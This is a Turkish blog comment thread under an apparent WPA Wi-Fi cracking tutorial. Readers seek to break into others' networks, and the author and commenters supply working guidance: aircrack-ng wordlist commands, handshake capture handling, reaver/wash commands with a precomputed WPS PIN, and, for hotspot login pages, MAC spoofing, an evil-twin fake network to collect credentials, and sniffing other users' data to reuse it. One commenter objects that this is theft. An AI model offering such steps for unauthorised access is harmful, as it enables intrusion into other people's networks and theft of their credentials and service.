    merhaba ; öncelikle şunu belirtmek istiyorum programı iyi güzel anlatmışınız eyvallah fakat bir konuda yanlışınız var bahsetmiş oldugunuz program size etraftaki ağları arayıp bulabilen msn dos yazılımdır . şimdi iyi güzel hoş program çalıştırdık var sayalım .txt dosyasından hazırlanmış olan şifreyi çekip bu tür programlar ancak deneyebiliyor yani bu atıp tutarak milyonda olan bir şanstır demek isityorum .çünki program sadece kulanıcıların hazırlamış oldugu not defretine yazmış oldugu yani bilmeyenler için söylüyorum şifrelere sayesinde bu program bunu deniyor bu kadar detaylı uğrasacagınıza bir ağ seçin atın tutun 123456- 102030 vs vs tutarsa zaten bağlanıcaktır yani bu programı kulanmak biraz saçma biraz değil bir hayli saçma çünki kendisi bulamıyor ancak sizin hazırlamış oldugunuz not defterindeki yazmış oldugunuz şifreleri deniyor ya tutarya ..bu olay nasrettin hocanın fıkrasına benzemiş gölü mayalamaya çalışıyormuş biri demişki ne yapıyorsun hocam gölü mayalıyorum adam gülmüş göl demiş mayalanırmı hoca efendi ya tutarsa demiş :))) umarım anlata bilmişimdir .insanlara yanlış bilgi vermeyiniz bence

    • #478 Murat Çeşmecioğlu tarafından, tarihinde

      Merhaba. Öncelikle haklısınız insanlara yanlış bilgi vermemek gerekir. Örneğin sizin söylediğiniz “… msn dos yazılımıdır.” gibi. Sanırım yazmak istediğiniz ms-dos olmalıydı. Fakat o da yanlış bir bilgidir. Çünkü Linux’un konsolu ve Windows’un Ms-DOS’u birbirinden çok farklıdır.
      Diğer yazdıklarınıza aynen katılıyorum. WPA için wordlistten şifre bulmak çok küçük bir olasılık. Bunu önceden yazının içinde belirtmiştim. Bir çok yorumumda belirttiğim gibi tekrar belirtiyorum: Ben günlük hayatta WPA kırmak için uğraşmıyorum çünkü milyonda yada milyarda bir olasılık.

  271. #479 nazım tarafından, tarihinde

    muraat bey oncelıkle herşey için teşekür ederimm. bilgilerin süper
    ben bunu merak ettim şifresi olan bir modemi niye kırayımki.
    şifresi olmayanı kırabiliyormuyuz. backtrack wordlistleri işe yararmı?
    wordtlis nerden bolabilirrim. teşekürler

    • #480 Murat Çeşmecioğlu tarafından, tarihinde

      Wordlistler internetteki bir çok sitede paylaşılıyor ancak yabancı sitelerdeki wordlistlerde yabancı sözcükler olduğu için türkiyede çalışması biraz zor.

  272. #481 Ali tarafından, tarihinde

    merhaba murat hocam bende bir soru sormak istiyorum bu wpa işine ilk sizin bilgilerle başladım backtrack 5’i sizin dediginiz gibi GRUB ile kurdugumda ag kartımı tanımıştı sonra VMware workstation 8 programını indirip ordan denedigimde ag kartımı tanımadı bütün sürümlerini denedim backtrack’ ın VMware ile uyumlu olan sürümünüde denedim oda olmadı acaba sebebi nedir bi çözümü varmıdır ?

    • #482 Murat Çeşmecioğlu tarafından, tarihinde

      VMWare ile kartları görmede sorun yaşayabilirsiniz. Dualboot yada USB’den çalıştırıp normal işletim sistemi gibi başlattığınızda kartlarınızı tanıyacaktır.

  273. #483 Ahmet Erkal tarafından, tarihinde

    Hocam ben cd ile topladığım handshake leri nasıl alabilirim yani flashdiske falan atabilirmiyim wordlistle çözmek için

    • #484 Murat Çeşmecioğlu tarafından, tarihinde

      Flashdiske alabilirsiniz. Oluşturulan .cap dosyasını flashdiske kopyalamanız yeterli.

  274. #485 bayhekim81 tarafından, tarihinde

    Kendi tecrübeniz doğrultusunda derlediğiniz bilgileri sunduğunuz için teşekkür ederim. Ekran kartı ile hızlandırma işlemini de sunmanızı isterim.

    • #486 Murat Çeşmecioğlu tarafından, tarihinde

      Teşekkür ederim. Ekran kartı hızlandırmayı da ileriki yazacağım yazıların arasına ekledim. Öneriniz için teşekkürler.

  275. #487 Tayfun tarafından, tarihinde

    Merhaba murat bey

    Ben wireless şifresi kırmayı bu şekilde değilde daha kısa bir yolu yokmudur acaba bunu daha bı degısık yontemı olmalıdır mutlaka 🙂
    yanlısınız var demıyorum yanlıs anlamayın :))
    Sadece cok karısık :))
    programlar felan aboo :)))

    ANLATIM ICIN TSKKRLER CEVABINIZI BEKLIYECEGIM..

    • #488 Murat Çeşmecioğlu tarafından, tarihinde

      O şekilde çok yöntemi var ancak ben temelini anlattım. Bir kaç kere Wireless şifresi kırarsanız çok karışık olmadığını görürsünüz. Kolay gelsin.

  276. #489 hasan tarafından, tarihinde

    merhaba murat abi ben bir wpa yakaladım ama onun şifresinin birazını biliyorum şifreyi değiştirmiş galiba eski şifrenin üzerine yeni birşeyler eklemiş yani bilgisayardan pek anlayan biri değil kullanan .bana sadece 1 -12 haneli sayıları deneyebilecek bir program lazım yada böylebir program varmı piyasada ?

  277. #491 ali tarafından, tarihinde

    Murat Abi backtrackte wordlist konumunu nasıl belirtebiliriz ?

    • #492 Murat Çeşmecioğlu tarafından, tarihinde

      aircrack-ng için gerekli parametreleri verirken -w parametresiyle belirteceksiniz. Örneğin komutu yazdığınız klasördeki wordlist.txt dosyasını kullanmak için -w wordlist.txt yazabilirsiniz.

  278. #493 oğuz tarafından, tarihinde

    hocam konsol nasıl ekleniyor bide onu söleseniz :S

    • #494 Murat Çeşmecioğlu tarafından, tarihinde

      Ekranın sol alt köşesindeki siyah pencere gibi ikona tıklarsanız yeni bir konsol açabilirsiniz.

  279. #495 45kaan45 tarafından, tarihinde

    öncellikle selam abi konumuz degil ama benin sizden ricam elimdeki bilgisayara windows 7 ile window8 yanyana kurarak bana açılışta ikisinde birini sormasını istiyorum. bu konuda bana yardımcı olurmusunuz abi yada bir kaynak gösterebilirmisiniz çok acil yorum yazabilirmisin 🙂 abi selamlarımla iyi akşamlar…

    • #496 Murat Çeşmecioğlu tarafından, tarihinde

      Windows 8 hakkında çok bir bilgim yok. Bununlar ilgili bir çok yabancı Windows forumu mevcut. Onlara başvurursanız daha iyi bir yanıt alabilirsiniz.

      NOT: Murat Çeşmecioğlu Windows 8 ürününü önermez 🙂 Sevmedim hiç.

  280. #497 hayyam tarafından, tarihinde

    iyi günler ab , öncelikle verdiğiniz bilgiler için size teşekkür etmeyi kendime borç biliyorum. çok çok TEŞEKKÜRLER. size bir sorum vardı. backtrack 5 r3 gnome kurulu bende nasıl bir wordlist oluşşturabilirm.

    • #498 Murat Çeşmecioğlu tarafından, tarihinde

      Masaüstüne bir yazı dosyası oluşturup içine satır satır denemek istediğiniz şifreleri yazıp kayıt edin. Wordlist’iniz kullanıma hazır 🙂

  281. #499 coşkun tarafından, tarihinde

    murat bey öncelikle çok teşekkür ederim yardımlarınız için .Ben pek anlamadan yapıyorum acemiyim ama windows 7 için wpa kırma ile ilgili backtrak ve EasyBCD yi bilgisayarıma indirdim.Ancak bilgisayarı yeniden açtığımda gerisini getiremiyorum.Ben yeniden açtığımda karşıma çıkanları size söyleyeyim ÖNCE 1) Windows 7 ve NeoGrub Bootloader diye iki seçenek çıkıyor. Ben Neo grub bootloader ı seçiyorum. SONRA 2) Çerçeve içerisinde Back Track yazıyor ve çerçevenin dışında en altta da şunlar yazıyor :Use ( yukarı ok işareti) and (aşağı ok işareti) keys to highlight on entry. Press Enter or ‘b ‘ to boot.
    Press ‘e’ to edit the commonds before booting , or ‘c ‘ for a command – line. 3) c ye basıyorum şunlar yazıyor
    (((Minimal BASH-like line editing is supported .For the first word , TAB lists possible command completions.Anywhere else TAB lists the possible completions of a device /filename
    ESC at any time exits)))
    grub> – bu en sonada komut yazılabiliyo. yardımınız için şimdiden çok teşekkür ederim .kolay gelsin

    • #500 Murat Çeşmecioğlu tarafından, tarihinde

      Anlattığınız 2 numaralı yerde C tuşuna değil Enter tuşuba basacaksınız.
      C tuşuna bastığınızda grub önyükleyicisinin komut satırına gider. Enter’a basıp Backtrack’in açılmasını sağlıyoruz.

  282. #501 coşkun tarafından, tarihinde

    HOCAM HERŞEY TAMAM AMA ŞU ANDA BACKTRACK AÇILIYOKEN YANİ YAZILAR YUKARI DOĞRU AKARKEN Bİ ANDA EKRAN KAPANIYOR .BİLGİSAYAR ÇALIŞIYOR AMA GÖRÜNTÜ YOK. (WİNDOWS 7) İŞLETİM SİSTEMİM. AĞ BAĞDAŞTIRICIM : Intel(R) Centrino(R) Wireless-N 1030 BİDE BIOSTAN HARİCİ EKRANI DAHİLİ EKRANA ÇEVİRECEKSEM EĞER ONUDA NASIL YAPICAM ACABA .ÇÜNKÜ BIOSA GİRİYORUM EKRANLA ALAKALI HİÇ BİŞEY GÖREMİYORUM BİLGİSAYAR MARKAM DELL INSPIRON 5110 HER ŞEY İÇİN ÇOK TŞK.

  283. #502 ömer tarafından, tarihinde

    öncelikle böyle bi paylasım yaptığınız için tsk kürler. benim bi sorum olacak ben bt4 r2 ve 5 gno kullanmaya çalışıyorum daha önce hiç linux proğramı kullanmadım …bi kaç kez denedim ama ne yaptımsa kıramadım şifreleri .wordlist olusturmakta güçlük çekiyorum her defasında command not foun diye hata alıyorum sizden ricam wordlist yapamayı ve handshake yakaladıktan sonra bu wordlisti nasıl kullanacağmızıda öğrenmek istiyorumdosyaları kayıt yyapamıyorum .kısacası bu işin cok acemisiyim ama merak sardım bu işe . bana detaylı bi şekilde bt4 r2 yi veya bt5 gno yu kullanmayı öğretirsenin cok memnuım kalacam … ilginiz için şimdiden tşk ler.

    • #503 Murat Çeşmecioğlu tarafından, tarihinde

      Wordlist yapmak için not defteri bir program açıp alt alta olası şifreleri yazmanız yeterli. Wordlist mantığı bu şekilde.
      Handshake yakaladaıktan sonra wordlist’i kullanmak için makalede verdiğim komutu kullanmanız yeterli. (aircrack-ng ile başlayan)

  284. #504 kemal tarafından, tarihinde

    adamsın hocam daha büyüğü yok 🙂

  285. #506 muhammet tarafından, tarihinde

    murat bey easybcd 2.1 kurdum ve sistem her açıldığında win8 mi neogrup bootloader mi diye soruyor easybcd yi kaldırdım fakat yine soruyor yardımcı olursanız sevinirim…

    • #507 Murat Çeşmecioğlu tarafından, tarihinde

      Easybcd ile henüz windows 8’i denemedim. Easybcd’yi kaldırmadan önce başlangıçtan neogrub’u silmeniz gerekli.

      Tekrar easybcd kurup neogrub’u başlangıçtan kaldırın.

  286. #508 Hasan tarafından, tarihinde

    Murat bey bu wordlist olayından hiç bişi anlamadım yahu wordlistsiz kırmanın bi yolu yokmu internette araştırdım wps pin,reaver gibi şeyler buldum bişiler denedim ama olmadı yardımcı olursanız çok sevinirim daha önce sizin sayeniz wep key kırdım şimdide wpa kırma istiyorum.

    • #509 Murat Çeşmecioğlu tarafından, tarihinde

      Reaver anlatımı yapacağım ancak etrafımda WPS’li modem yok. Kendi modemim de WPS’li değil 🙂
      Wordlist yapmak basit: Bir not defteri açın ve içine alt alta aklınıza gelecek tüm şifreleri yazın.

  287. #510 Hanzala tarafından, tarihinde

    Ben Xiaopan ile wpa sifresi kırdım tabi bu wps acıgı olan bir agdı. ZCK isimli agı kırdıktan sonra bir wpa psk verdi bu cok uzun ve karsık bir sifreydi buna rağmen denedim olmadı, başka bir ag kırma işleminde başarılı bir sifre verdi. Digerinde türkce karakter ile şifreleme yapılmış olduğunu düşünüyorum. Yapılabilecek bir sey var mı?

    • #511 Murat Çeşmecioğlu tarafından, tarihinde

      Yanlış bilmiyorsam Reaver, WPS’i sonra hızlıca kırmak için başka bir şifre veriyordu. Bununla ilgili yazımı yazınca bahsedeceğim.

  288. #512 Aykut KÖSE tarafından, tarihinde

    Milletin emeğini parasını sömürmeyin böyle işlerle.Yaptığınız hem hırsızlık hem kul hakkı.Şahsen ben şifremi biri çalsa hakkımı haram ederim.Anlarsam da gider savcılığa başvururum.Hırsızlık zaten.Kendinizi hacker sanıp kahramanlılara kalkışmayın.

  289. #514 45kaan45 tarafından, tarihinde

    öncelikle buradaki yardımları için teşekkürler. abi benim bir sorum olacaktı. güvenlik WEP WPA WPA/2 olamayan wifiler var aga bağlanıyorsun ama senden oturum bilgileri istiyor seni sitesine atıyor oraya adını ve şifreni yazarak internete çıkmanı sağlıyor bunların da şifrelerinin kırılmasıda mumkun mu yada bunlar nasıl oluyor abi bilgin varsa bizi aydınlatırsan abi şimdiden teşekkürler.

  290. #515 onur karasu tarafından, tarihinde

    merhaba..
    bende bu aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt
    komut satırından sonra aşağıdaki yazılar çıkıyor nerede hata yaptım yada nasıl yapmam gerekiyor? yardımcı olursanız sevinirim..
    aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt
    fopen(dictionary) failed: No such file or dictionary
    fopen(dictionary) failed: No such file or dictionary
    please specify a dictionary (option -w).

    Qutting aircrack-ng…
    root@bt:-#

    • #516 Murat Çeşmecioğlu tarafından, tarihinde

      Wordlist dosyanız keyler.txt olarak komutu çalıştırdığınız klasörde mi?

  291. #517 Mert Kuzay tarafından, tarihinde

    Öncelikle merhaba benim çok ufak bir sorum olacaktı. bu şifre deneme olayında modem şifresini mi deniyor yoksa wireless bağlantı şifresini mi ?

  292. #519 barbaros tarafından, tarihinde

    ben denedim bitane patlattım ama şifre çok basit harf ve rakam olmasına rağmen toplam 10 haneli üstelik yabancı wordlistle oldu bu iş şans işi birazda

  293. #520 ömer tarafından, tarihinde

    hocam bide wordlist yapmayı ve bu nu kullanmayı gösterseniz resimli olarak cok iyi olur.. biraz acemiyimde bu işte

  294. #521 Mert Kuzay tarafından, tarihinde

    Merhabalar. herşeyi yapıyorum fakat txt dosyası yazma kısmına gelince passphrase not in dictionary hatası alıyorum bu tam olarak ne demek ?

  295. #522 mustafa tarafından, tarihinde

    backtrack 5 ilede yapabilirmiyiz bu işlemleri? 4 ün bulamadım setup unuda yardımcı olursanız sevinirim

  296. #524 kaan tarafından, tarihinde

    HotSpot Güvenlik Sayfasını aşılabilir mi? abi

    • #525 Murat Çeşmecioğlu tarafından, tarihinde

      MAC spoof yapılabilir.
      Aynı isimde sahte bir ağ kurulup diğer kullanıcıların girmesi beklenir, yazılan veriler toplanır 🙂

  297. #526 kaan tarafından, tarihinde

    selamabi benim bir sorum olacaktı wifi yayını yapan hotspot ile internete bağlandıgınmızda bizden kulllanıcı adı ve şifre istiyor güvenlik türü ne wep nede wpa yada wpa2 degil güvenlik türü sadece güvenli degil bu tür yayın yapan wifilerin bu güvenlik yayınını nasıl aşılır?

    • #527 Murat Çeşmecioğlu tarafından, tarihinde

      Aklıma gelen basit yöntemlerden birisi ağı dinlemek ve diğer kullanıcıların post ettiği verileri toplamak. Sonra bunları kullanabilirsiniz.

  298. #528 esref kalem tarafından, tarihinde

    murat bey ben xiapoan ile handshake yakaladım ve elimde bir wordlistte var fakat ben xiapoanda iken usb içindeki wordlistleri bulamıyorum(xiapoanı usb den boot ederek kullanıyorum) nerede yanlış yapıyorum sizce teşekkürler

  299. #530 murat tarafından, tarihinde

    ben bu yöntemle wpa2 kırdım 10dk almadı ; yöntemlere uyun okadarr; bide wordlis herşey basitt ; yemin bile edebilirim…

  300. #531 Erol tarafından, tarihinde

    Yav birader ”Sizin elinizdeki listede kıracağınız modemin şifresi yoksa bu iş olmaz. Tekrar ediyorum elinizdeki listede olmazsa kıramazsınız.” demişsin benim elimde şifre olsa niye şifre kırmaya çalışayım sen milletle dalgamı geçiyorsun böyle boş yazılar yayınlayarak milletin vaktini boşa harcama kendine başka oyuncak bul kardeşim.

    • #532 Murat Çeşmecioğlu tarafından, tarihinde

      Sanırım olayı tamamen yanlış anladınız: Diyelim ki elinizde 1 den 99’a kadar sayıların olduğu bir liste var. Ama hangisinin benim şifrem olduğunu bilmiyorsunuz. WPA kırarken tüm şifreleri deniyoruz. Elinizdeki listede benim şifrem varsa denemelerden birinde elbette doğru şifre olacaktır.

  301. #533 Gökhan tarafından, tarihinde

    Harici Modem Olarak Hangisi Kullanmalıyız.

    • #534 Murat Çeşmecioğlu tarafından, tarihinde

      Şu an elimde Bimeks’ten alınmış TPLink TL-WN722N modeli var. Xiaopan ile çalışıyor. Büyük ihtimalle Backtrack ile de çalışır. Henüz deneme yapma fırsatım olmadı.

  302. #535 Samet varol tarafından, tarihinde

    s.a abi bu wpa 2 şifre kırma ile ilgili bi çok şey okudum vps pini ile şifre kırılıyomuş backtrack 5 de yapılıyomuş bu işlem. http://www.yanghengfei.com/demo/wifi/pin.php bu adrese modemin maç adresinin son 6 hanesini yazıyomuşuz bize modemin vps pinini veriyomuş o verilen pin ile denesek ne kadar doğru olur ? yapabilirmiyiz yani ? daha önce hiç denemedim ama denemeyi düşünüyorum bu konuyu bi açıklığa kavuşturda abi böyle bişi varsa yapıyım bende şimdiden teşkrler abi 😀

    • #536 Murat Çeşmecioğlu tarafından, tarihinde

      Denemedim ama sadece MAC adresinin 2 şekilde olduğu durumlarda çalışıyor diyor. Öyle bir mac adresine sahip modem varsa dene.

  303. #537 abdulkadir tarafından, tarihinde

    wordlist indirebileceğim bir site varmı? sizdeki wordlisti upload edebilir misiniz?

    • #538 Murat Çeşmecioğlu tarafından, tarihinde

      Benim kullandığım bir wordlist yok. Google’dan araştırabilirsiniz.

  304. #539 ozgur tarafından, tarihinde

    sa wpa2-psk sifre nasıl kıra bılırız acaba yardımcı olabilirmisiniz ?

    • #540 Murat Çeşmecioğlu tarafından, tarihinde

      Elinizde sağlam bir wordlist olması gerekiyor. WPS özelliği varsa onu denemenizi tavsiye ederim.

  305. #541 abdullah tarafından, tarihinde

    harici wireless adaptor şart mi. dahili bilgisayardaki wireless kartlari olmaz mi

  306. #543 Mertcan tarafından, tarihinde

    Merhaba arkadaşlar bundan 2 yıl önce bende wireless şifre kırma çabasındaydım başarılı da oldum edindiğim tecrübeleri anı’ ları sizinle paylaşmak istiyorum :).Öncelikle Murat abi çok güzel paylaşımlar yaparak olayı anlatmış bende ilk beini ve backtrack de wireless kırmayı bu siteden bakarak yapmıştım ve de başarılı oldum biraz ara verdim sonra tekrar merak sardım.Bundan 2 yıl önce wpa şifre kırmak imkansız gibi bişeydi ama şimdi değil çünkü; wps ile wpa da kırılabiliyo artık, henüz wpa kırmadım ama wireless alıcımı evde bulsam bitane wpa şifresi kıracağım 🙂 özellikle şunu demek istiyorum wordlistle wpa kırmaya çalışmmayın arkadaşlar çünkü çok düşük bir ihtimal ama wps ile kırabiliyosunuz wpa kırmaya uğraşın en az 10 en fazla 24 saatte mümkün oldu.(tabi saldırı yapıp kıracağınız modemin wps özelliğinin açık olması gerekiyo) bişey daha söylemek istiyorum internette 40 tl ye çok güzel wireless alıcıları mevcut bu gün baktım sistem gelişmiş hatta everest in bi alıcısını kullanan arkadaşım var alet duvar felan tanımıyo tabi netmaster da bu işte iyi o modemi de kullanabilirsiniz.Şuan bu yazıyı aylık 60 tl verip kullandığım kendi internetimden yazıyorum internete 60 tl çok ama mecbur,inşallah sizlerde(evinde neti olmayanlar)evinizde internete sahip olursunuz böyle programlarla felan uğraşmaşmazsınız ama herkesin keyfine göre(benim evimde net var ama wpa kırmak için alıcımı bulup en kısa zamanda içimde kalan kırma isteğini gidereceğim:).herkese başarılar saygılar sevgiler 🙂

  307. #544 Kenan tarafından, tarihinde

    Murat bey öncelikle verdiğiniz bilgiler için çok teşekkür ederim. Samet beyin sorusuna gelince; Evet doğru, son 6 haneyi yazdıktan sonra sitenin size verdiği kodu ilgili yere yazıp işlemi başlatıyorsunuz. Çok kısa bir süre sonra işlem sona erdiğinde şifre karşınızda, hemde wordlist olmadan. 🙂

    Ben bu işlemi Backtrack 5 ile aynen aşağıdaki şekilde yazdığım gibi uyguladım ve sonuç aldım.

    airmon-ng start wlan0
    wash -i mon0
    reaver -i mon0 -c 11 -b 06:22:14:2D:C5:E1 -p 29997770 -vv

    Sonuç mükemmel ancak her modemde işe yaramıyor!
    Not: MAC adresi örnek olarak verilmiştir..

  308. #545 mesut tarafından, tarihinde

    merhaba ben 4 ay önce wps li bir modemi kırdım ve daha sonra fima güncelleme yaptı modeme ve ben wps nin şifresini unuttum ama wifi şifresi elimde bağlı olduğum modemin wps bini gösteren bi program biliyormusunuz bu konuda yardımınızı bekliyorum teşekkürler simdiden

    • #546 Murat Çeşmecioğlu tarafından, tarihinde

      Modem ayar sayfasına girip öğrenebilirsiniz. Bazı modemlerde bu özellik var.
      Yada tekrar kırmak gerekir 🙂

  309. #547 HALİM tarafından, tarihinde

    slm kolay gelsın bnde bt4 & bt5 var bunallları cozemedım bı turlu yardımcı olurmusunuz

  310. #549 YILKI tarafından, tarihinde

    Evet tp-linkler atheros chipset backtrakla güzel çalışıyor yalnız wn 822 çift antenli olanı bazen win 7 ile bile tam uyuşamadığndan btrack driveri yüklemediği zaman olabiliyor ama bana sanırım7/8 tane wep şifresi gayet güzel kırdırdı :)) tavsiyem TP-Llnk wifi 3tane aldım 3üde tp-link

  311. #550 levent tarafından, tarihinde

    Her türlü modem şifresi kırılabiliyor artık.
    Elinizde 3 şey bulunması yeterli :

    1-Reaver benzeri program.
    2-Modem MAC adresi.
    3-Modem pin numarası.

    En fazla 5 dk içerisinde bütün şifreler kırılabiliyor.
    En büyük sorun ise; modeme ait doğru pin numarasını tespit edebilmek.

  312. #551 sercan tarafından, tarihinde

    şifre kırmak için internetınızın olması şartmı ? yoksa modemın wierlesi internet olmadan kullanıla biliyormu ?

Yorum Yazın

İsim (gerekli)

E-Posta (gerekli)

İnternet sitesi